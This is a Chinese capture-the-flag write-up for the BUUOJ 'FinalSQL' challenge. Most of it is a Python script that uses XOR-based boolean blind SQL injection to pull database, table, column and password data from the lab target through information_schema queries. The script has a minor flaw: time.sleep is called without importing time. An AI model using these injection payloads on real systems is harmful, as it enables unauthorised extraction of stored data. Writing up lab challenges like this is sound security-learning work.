[极客大挑战 2019]FinalSQL

知识点

• 盲注

题目URL

http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1

 

 

由 1^2=3,令id=1^2成功得到id=3的页面

 

脚本

# -*- coding: utf-8 -*-
import requests
url = 'http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1'
res = ''
for i in range(1,500):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:        
        #payload = "^(ascii(substr(database(),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),{},1))>{})".format(i,mid)
        payload = "^(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(i,mid)
        r = requests.get(url=url+payload)        
        #print(mid)
        if r.status_code == 429:
            print('too fast')
            time.sleep(1)
        if 'NO! Not this! Click others~~~' not in r.text:
            left = mid + 1
        elif 'NO! Not this! Click others~~~' in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 127 or mid == 31:
        break
    res += chr(mid)
    print(str(mid),res)
#库 geek
#表 F1naI1y,Flaaaaag
#列 id,username,password  id,fl4gawsl